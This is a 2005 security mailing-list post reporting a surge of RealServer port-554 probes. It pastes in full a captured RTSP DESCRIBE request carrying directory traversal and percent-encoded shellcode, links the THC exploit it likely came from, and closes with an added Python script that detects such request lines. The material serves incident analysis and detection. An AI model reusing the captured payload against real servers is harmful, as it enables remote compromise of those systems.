THC's RealServer (port 554) exploit?

From: Stefan Pettersson (stefan.pets_at_home.se)
Date: 02/16/05

  • Next message: Collin: "Re: New MSN worm?"
Date: Wed, 16 Feb 2005 17:53:07 +0100
To: incidents@securityfocus.com

    Hi, I'm kinda new to this field, so please bear with me.

    I've got a massive increase in connection requests to port 554 (RealServer) this
    afternoon. I haven't given much thought to earlier connections, but when looking
    through the firewall log I see that I've gotten a few in the past as well. There is
    however no doubt that the traffic has increased _greatly_ this afternoon. (Almost)
    every attempt is sent by a different address. I don't know if these are decoys
    though.

    I was curious about this so I opened the port up and ran

    nc -l -p 554 > output

    to see what the probes tried to send. What I got was definitely an exploit attempt.

    DESCRIBE /../../../../ΜΜ%eb%15%b9%8b%e6%13%41%81%f1%39%e6%13%41%5e%80%74%31%ff%9e%e2%f9%eb%05%e8%e6%ff%ff%ff%ad%45%fa%15%dd%ae%15%de%92%15%ee%82%33%15%e6%96%76%db%9e%9e%9e%cd%c8%15%c1%a2%15%c2%a5%e6%9d%41%cd%15%c5%be%9d%41%cd%1d%5d%9a%15%ad%9d%69%ad%57%32%ac%56%5f%5f%9b%1a%5e%eb%68%b5%54%eb%77%c6%b5%46%4f%75%c0%9d%c0%ba%9d%41%f8%15%95%15%c0%82%9d%41%15%9a%15%9d%59%c0%c5%61%7e%c0%f6%ad%ac%9e%9e%f6%e9%ed%ac%c1%ca%24%0c%f0%9a%1a%61%48%15%66%1f%72%9e%9c%9e%9e%15%72%cd%f4%9f%f4%9c%24%1d%cd%1d%9e%61%48%cd%cd%f6%4d%43%8d%24%f6%9c%9e%7e%ec%15%4a%15%46%f4%8e%cc%cd%24%fd%ae%fe%c4%61%48%ce%2a%9c%ce%cb%cd%24%9e%c6%fe%7c%61%48%21%a3%36%27%f3%61%7b.smi RTSP/1.0

    I removed a "few" /../..

    I searched the web for this and found that this is an old exploit, most likely this
    one:

    http://www.thc.org/exploits/THCrealbad.c

    But that one is almost two years old, so why does it show up this much now, so suddenly?
    It has only been going on for a few hours. Is there something new that has come out,
    or is it just a coincidence?

    Regards,
    Stefan Pettersson
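The netcat capture above records a single RTSP request line; the traits that make it recognizable as an exploit attempt rather than a media client are visible in that line alone: a `DESCRIBE` whose target starts with a stack of `../` steps, followed by a long run of percent-encoded bytes that decode to non-printable values, ending in a `.smi` suffix. The following Python script is an added example (not part of Stefan's post, THCrealbad.c, or RealServer) that triages captured request lines on those traits. The RTSP method list is the one from RFC 2326; the thresholds (`MAX_TRAVERSAL_STEPS`, `MAX_NONPRINTABLE`) and the two sample request lines are assumptions constructed for illustration, and the percent-encoded filler is arithmetic filler, not the bytes from the capture.

```python
"""Triage a captured RTSP request line for traversal + encoded-binary probes.

Added example, not code from the original post or from any RealServer tool.
Thresholds and sample inputs below are constructed assumptions.
"""
import re
from urllib.parse import unquote_to_bytes

# Methods defined by RFC 2326 (RTSP/1.0).
RTSP_METHODS = {
    "OPTIONS", "DESCRIBE", "ANNOUNCE", "SETUP", "PLAY", "PAUSE", "TEARDOWN",
    "GET_PARAMETER", "SET_PARAMETER", "REDIRECT", "RECORD",
}

PCT_BYTE = re.compile(r"%[0-9A-Fa-f]{2}")

# Assumed thresholds: a media URL never needs "../", and a handful of
# non-printable decoded bytes is tolerated for odd filenames.
MAX_TRAVERSAL_STEPS = 0
MAX_NONPRINTABLE = 8


def parse_request_line(line):
    """Split 'METHOD target RTSP/x.y' into (method, target, version), else None."""
    parts = line.strip().split(" ")
    if len(parts) != 3 or not parts[2].startswith("RTSP/"):
        return None
    return parts[0], parts[1], parts[2]


def analyze_request_line(line):
    """Return a dict of measured traits plus the findings that fired."""
    parsed = parse_request_line(line)
    if parsed is None:
        return {"parsed": False, "findings": ["not an RTSP request line"],
                "suspicious": True}
    method, target, version = parsed
    decoded = unquote_to_bytes(target)          # resolve %xx escapes to raw bytes
    traversal_steps = target.count("../")       # each "../" is one step up
    percent_encoded = len(PCT_BYTE.findall(target))
    nonprintable = sum(1 for b in decoded if b < 0x20 or b > 0x7E)

    findings = []
    if method not in RTSP_METHODS:
        findings.append("unknown RTSP method %r" % method)
    if traversal_steps > MAX_TRAVERSAL_STEPS:
        findings.append("directory traversal: %d '../' steps" % traversal_steps)
    if nonprintable > MAX_NONPRINTABLE:
        findings.append("%d non-printable bytes after decoding %d %%xx escapes"
                        % (nonprintable, percent_encoded))

    return {
        "parsed": True, "method": method, "version": version,
        "traversal_steps": traversal_steps, "percent_encoded": percent_encoded,
        "nonprintable": nonprintable, "decoded_length": len(decoded),
        "findings": findings, "suspicious": bool(findings),
    }


# Constructed samples. BENIGN mimics a normal client; PROBE has the shape of the
# captured line, but its escapes are arithmetic filler, not the real bytes.
BENIGN = "DESCRIBE rtsp://media.example.invalid/clips/intro.rm RTSP/1.0"
FILLER = "".join("%%%02x" % ((i * 37 + 11) & 0xFF) for i in range(40))
PROBE = "DESCRIBE /../../../../" + FILLER + ".smi RTSP/1.0"

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("probe", PROBE)):
        result = analyze_request_line(sample)
        print(name, "suspicious" if result["suspicious"] else "clean")
        for finding in result["findings"]:
            print("  -", finding)
```

Pointing this at the `output` file netcat wrote (one request line per capture) gives a per-probe verdict without having to eyeball hex; the same traits also serve as an IDS rule sketch, since a legitimate RealPlayer `DESCRIBE` carries a plain URL and never climbs out of the content root.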

